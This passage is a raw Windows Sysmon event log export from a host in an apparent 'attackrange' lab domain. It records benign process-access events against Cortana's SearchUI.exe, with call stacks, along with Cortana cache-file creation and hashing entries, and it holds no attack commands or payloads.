Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD8596B390E508AB6331B9D92C006BE5,SHA256=AE3ED70DB2F7B79C7129A127DCA58B8E7019751F4DA0FB833D3983FD8BF788F8,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000006709Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.056{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+f98a|C:\Windows\System32\execmodelclient.dll+f830|C:\Windows\System32\execmodelclient.dll+1e079|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006708Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.056{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+f98a|C:\Windows\System32\execmodelclient.dll+f8ac|C:\Windows\System32\execmodelclient.dll+1e05b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006707Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.056{266CAFBE-64C4-6064-9C00-00000000AE01}46204872C:\Windows\system32\sihost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+72b5|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000006706Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.056{266CAFBE-64C4-6064-9C00-00000000AE01}46204872C:\Windows\system32\sihost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000006705Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.056{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000006704Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.056{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000006703Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.056{266CAFBE-64C5-6064-A500-00000000AE01}43565368C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+182ce3|C:\Windows\SYSTEM32\ntdll.dll+80974|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000006702Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.056{266CAFBE-64C5-6064-A500-00000000AE01}43565368C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+182ce3|C:\Windows\SYSTEM32\ntdll.dll+80974|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006701Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.056{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\W
indows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000006700Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.056{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000006699Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.041{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006698Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.041{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006697Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.041{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000006696Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.025{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt2021-03-31 12:02:31.010 23542300x80000000000000006695Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.025{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006694Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.025{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt2021-03-31 12:02:31.010 11241100x80000000000000006693Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.010{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt2021-03-31 12:02:31.010 23542300x80000000000000006692Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.010{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006691Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.010{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt2021-03-31 12:02:31.010 11241100x80000000000000006690Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.010{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt2021-03-31 12:02:31.010 23542300x80000000000000006689Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.010{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006688Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.010{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_15[1].txt2021-03-31 12:02:31.010 11241100x80000000000000006687Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.010{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt2021-03-31 12:02:31.010 23542300x80000000000000006686Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.010{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006685Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.010{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt2021-03-31 12:02:31.010 11241100x80000000000000006684Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.010{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt2021-03-31 12:02:31.010 23542300x80000000000000006683Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.010{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006682Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.010{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt2021-03-31 12:02:31.010 11241100x80000000000000006681Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.994{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt2021-03-31 12:02:30.994 23542300x80000000000000006680Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.994{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006679Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.994{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt2021-03-31 12:02:30.994 11241100x80000000000000006678Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.994{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt2021-03-31 12:02:30.994 23542300x80000000000000006677Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.994{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007406Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:32.801{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C